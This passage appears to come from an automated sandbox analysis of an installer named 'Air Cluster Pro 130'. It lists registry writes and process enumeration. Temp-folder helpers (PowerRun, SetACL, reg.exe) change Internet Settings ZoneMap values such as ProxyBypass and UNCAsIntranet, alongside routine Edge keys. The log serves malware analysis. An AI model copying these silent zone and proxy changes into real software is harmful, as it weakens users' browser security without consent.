Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" N/A N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL64.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\History C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\SignaturePolicy = 06000000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore\LastCleanup = 0000000000000000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\ACGPolicyState = "6" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\History\CacheLimit = "1" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 7eb0ee92bfb2d901 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Extensible Cache C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active\{2EF5A3B7-4AEA-42BC-A7EA-57D099F85AC4} = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{AEBA21FA-782A-4A90-978D-B7216 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionHigh = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\msn.com C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\msn.com C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\Extensions C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VendorId = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\DisallowDefaultBrowserPrompt = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DXFeatureLevel = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\Active = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\Total C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CachePrefix C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{A8A88C49-5EB2-4990-A1A2-08760 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\Content C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\History\CachePrefix = "Visited:" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Explorer\Main C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Explorer C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\JumpListFirstRun = "3" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionHigh = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = e66ac78dbfb2d901 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\DynamicCodePolicy = 05000000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\EnablementState = "1" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = 01000000dff34c8e27ffa3a149b972a8d0f6faab57fa348acbbbfe6264136ab490383e4a07452f52acab0367b7d3bfc7af2e3940921e30ca88a092da7e8a C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\CIPolicyState = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionLow = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\www.msn.com C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Content\CachePrefix C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\JumpListInPrivateBrowsingAllowed = "1" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = bb47bf9fbfb2d901 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DeviceId = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "1" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\Cookies\CacheLimit = "1" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-83S92.tmp\Air Cluster Pro 130.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-83S92.tmp\Air Cluster Pro 130.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-D3BNR.tmp\s0.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-D3BNR.tmp\s0.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe N/A
N/A N/A C:\Windows\System32\Conhost.exe N/A
N/A N/A C:\Windows\System32\Conhost.exe N/A
N/A N/A C:\Windows\System32\Conhost.exe N/A
N/A N/A C:\Windows\System32\Conhost.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
